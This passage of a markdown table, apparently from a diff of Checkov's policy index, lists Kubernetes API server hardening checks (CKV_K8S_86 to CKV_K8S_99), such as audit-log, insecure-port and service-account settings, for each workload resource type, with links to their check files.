[ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | +| 3130 | CKV_K8S_86 | resource | DeploymentConfig | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | +| 3131 | CKV_K8S_86 | resource | Job | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | +| 3132 | CKV_K8S_86 | resource | Pod | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | +| 3133 | CKV_K8S_86 | resource | PodTemplate | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | +| 3134 | CKV_K8S_86 | resource | ReplicaSet | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | +| 3135 | CKV_K8S_86 | resource | ReplicationController | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | +| 3136 | CKV_K8S_86 | resource | StatefulSet | Ensure that the --insecure-bind-address argument is not set | Kubernetes | [ApiServerInsecureBindAddress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecureBindAddress.py) | +| 3137 | CKV_K8S_88 | resource | CronJob | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | +| 3138 | CKV_K8S_88 | resource | DaemonSet | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | +| 3139 | CKV_K8S_88 | resource | Deployment | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | +| 3140 | CKV_K8S_88 | resource | DeploymentConfig | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | +| 3141 | CKV_K8S_88 | resource | Job | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | +| 3142 | CKV_K8S_88 | resource | Pod | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | +| 3143 | CKV_K8S_88 | resource | PodTemplate | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | +| 3144 | CKV_K8S_88 | resource | ReplicaSet | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | +| 3145 | CKV_K8S_88 | resource | ReplicationController | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | +| 3146 | CKV_K8S_88 | resource | StatefulSet | Ensure that the --insecure-port argument is set to 0 | Kubernetes | [ApiServerInsecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerInsecurePort.py) | +| 3147 | CKV_K8S_89 | resource | CronJob | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | +| 3148 | CKV_K8S_89 | resource | DaemonSet | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | +| 3149 | CKV_K8S_89 | resource | Deployment | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | +| 3150 | CKV_K8S_89 | resource | DeploymentConfig | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | +| 3151 | CKV_K8S_89 | resource | Job | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | +| 3152 | CKV_K8S_89 | resource | Pod | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | +| 3153 | CKV_K8S_89 | resource | PodTemplate | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | +| 3154 | CKV_K8S_89 | resource | ReplicaSet | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | +| 3155 | CKV_K8S_89 | resource | ReplicationController | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | +| 3156 | CKV_K8S_89 | resource | StatefulSet | Ensure that the --secure-port argument is not set to 0 | Kubernetes | [ApiServerSecurePort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerSecurePort.py) | +| 3157 | CKV_K8S_90 | resource | CronJob | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | +| 3158 | CKV_K8S_90 | resource | DaemonSet | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | +| 3159 | CKV_K8S_90 | resource | Deployment | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | +| 3160 | CKV_K8S_90 | resource | DeploymentConfig | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | +| 3161 | CKV_K8S_90 | resource | Job | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | +| 3162 | CKV_K8S_90 | resource | Pod | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | +| 3163 | CKV_K8S_90 | resource | PodTemplate | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | +| 3164 | CKV_K8S_90 | resource | ReplicaSet | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | +| 3165 | CKV_K8S_90 | resource | ReplicationController | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | +| 3166 | CKV_K8S_90 | resource | StatefulSet | Ensure that the --profiling argument is set to false | Kubernetes | [ApiServerProfiling.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerProfiling.py) | +| 3167 | CKV_K8S_91 | resource | CronJob | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | +| 3168 | CKV_K8S_91 | resource | DaemonSet | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | +| 3169 | CKV_K8S_91 | resource | Deployment | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | +| 3170 | CKV_K8S_91 | resource | DeploymentConfig | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | +| 3171 | CKV_K8S_91 | resource | Job | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | +| 3172 | CKV_K8S_91 | resource | Pod | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | +| 3173 | CKV_K8S_91 | resource | PodTemplate | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | +| 3174 | CKV_K8S_91 | resource | ReplicaSet | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | +| 3175 | CKV_K8S_91 | resource | ReplicationController | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | +| 3176 | CKV_K8S_91 | resource | StatefulSet | Ensure that the --audit-log-path argument is set | Kubernetes | [ApiServerAuditLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLog.py) | +| 3177 | CKV_K8S_92 | resource | CronJob | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | +| 3178 | CKV_K8S_92 | resource | DaemonSet | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | +| 3179 | CKV_K8S_92 | resource | Deployment | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | +| 3180 | CKV_K8S_92 | resource | DeploymentConfig | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | +| 3181 | CKV_K8S_92 | resource | Job | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | +| 3182 | CKV_K8S_92 | resource | Pod | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | +| 3183 | CKV_K8S_92 | resource | PodTemplate | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | +| 3184 | CKV_K8S_92 | resource | ReplicaSet | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | +| 3185 | CKV_K8S_92 | resource | ReplicationController | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | +| 3186 | CKV_K8S_92 | resource | StatefulSet | Ensure that the --audit-log-maxage argument is set to 30 or as appropriate | Kubernetes | [ApiServerAuditLogMaxAge.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxAge.py) | +| 3187 | CKV_K8S_93 | resource | CronJob | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | +| 3188 | CKV_K8S_93 | resource | DaemonSet | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | +| 3189 | CKV_K8S_93 | resource | Deployment | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | +| 3190 | CKV_K8S_93 | resource | DeploymentConfig | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | +| 3191 | CKV_K8S_93 | resource | Job | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | +| 3192 | CKV_K8S_93 | resource | Pod | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | +| 3193 | CKV_K8S_93 | resource | PodTemplate | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | +| 3194 | CKV_K8S_93 | resource | ReplicaSet | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | +| 3195 | CKV_K8S_93 | resource | ReplicationController | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | +| 3196 | CKV_K8S_93 | resource | StatefulSet | Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate | Kubernetes | [ApiServerAuditLogMaxBackup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxBackup.py) | +| 3197 | CKV_K8S_94 | resource | CronJob | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | +| 3198 | CKV_K8S_94 | resource | DaemonSet | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | +| 3199 | CKV_K8S_94 | resource | Deployment | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | +| 3200 | CKV_K8S_94 | resource | DeploymentConfig | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | +| 3201 | CKV_K8S_94 | resource | Job | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | +| 3202 | CKV_K8S_94 | resource | Pod | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | +| 3203 | CKV_K8S_94 | resource | PodTemplate | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | +| 3204 | CKV_K8S_94 | resource | ReplicaSet | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | +| 3205 | CKV_K8S_94 | resource | ReplicationController | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | +| 3206 | CKV_K8S_94 | resource | StatefulSet | Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate | Kubernetes | [ApiServerAuditLogMaxSize.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerAuditLogMaxSize.py) | +| 3207 | CKV_K8S_95 | resource | CronJob | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | +| 3208 | CKV_K8S_95 | resource | DaemonSet | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | +| 3209 | CKV_K8S_95 | resource | Deployment | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | +| 3210 | CKV_K8S_95 | resource | DeploymentConfig | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | +| 3211 | CKV_K8S_95 | resource | Job | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | +| 3212 | CKV_K8S_95 | resource | Pod | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | +| 3213 | CKV_K8S_95 | resource | PodTemplate | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | +| 3214 | CKV_K8S_95 | resource | ReplicaSet | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | +| 3215 | CKV_K8S_95 | resource | ReplicationController | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | +| 3216 | CKV_K8S_95 | resource | StatefulSet | Ensure that the --request-timeout argument is set as appropriate | Kubernetes | [ApiServerRequestTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerRequestTimeout.py) | +| 3217 | CKV_K8S_96 | resource | CronJob | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | +| 3218 | CKV_K8S_96 | resource | DaemonSet | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | +| 3219 | CKV_K8S_96 | resource | Deployment | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | +| 3220 | CKV_K8S_96 | resource | DeploymentConfig | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | +| 3221 | CKV_K8S_96 | resource | Job | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | +| 3222 | CKV_K8S_96 | resource | Pod | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | +| 3223 | CKV_K8S_96 | resource | PodTemplate | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | +| 3224 | CKV_K8S_96 | resource | ReplicaSet | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | +| 3225 | CKV_K8S_96 | resource | ReplicationController | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | +| 3226 | CKV_K8S_96 | resource | StatefulSet | Ensure that the --service-account-lookup argument is set to true | Kubernetes | [ApiServerServiceAccountLookup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountLookup.py) | +| 3227 | CKV_K8S_97 | resource | CronJob | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | +| 3228 | CKV_K8S_97 | resource | DaemonSet | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | +| 3229 | CKV_K8S_97 | resource | Deployment | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | +| 3230 | CKV_K8S_97 | resource | DeploymentConfig | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | +| 3231 | CKV_K8S_97 | resource | Job | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | +| 3232 | CKV_K8S_97 | resource | Pod | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | +| 3233 | CKV_K8S_97 | resource | PodTemplate | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | +| 3234 | CKV_K8S_97 | resource | ReplicaSet | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | +| 3235 | CKV_K8S_97 | resource | ReplicationController | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | +| 3236 | CKV_K8S_97 | resource | StatefulSet | Ensure that the --service-account-key-file argument is set as appropriate | Kubernetes | [ApiServerServiceAccountKeyFile.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerServiceAccountKeyFile.py) | +| 3237 | CKV_K8S_99 | resource | CronJob | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | +| 3238 | CKV_K8S_99 | resource | DaemonSet | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | +| 3239 | CKV_K8S_99 | resource | Deployment | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | [ApiServerEtcdCertAndKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/ApiServerEtcdCertAndKey.py) | +| 3240 | CKV_K8S_99 | resource | DeploymentConfig | Ensure that the --etcd-certfile and --etcd-keyfile arguments are set as appropriate | Kubernetes | 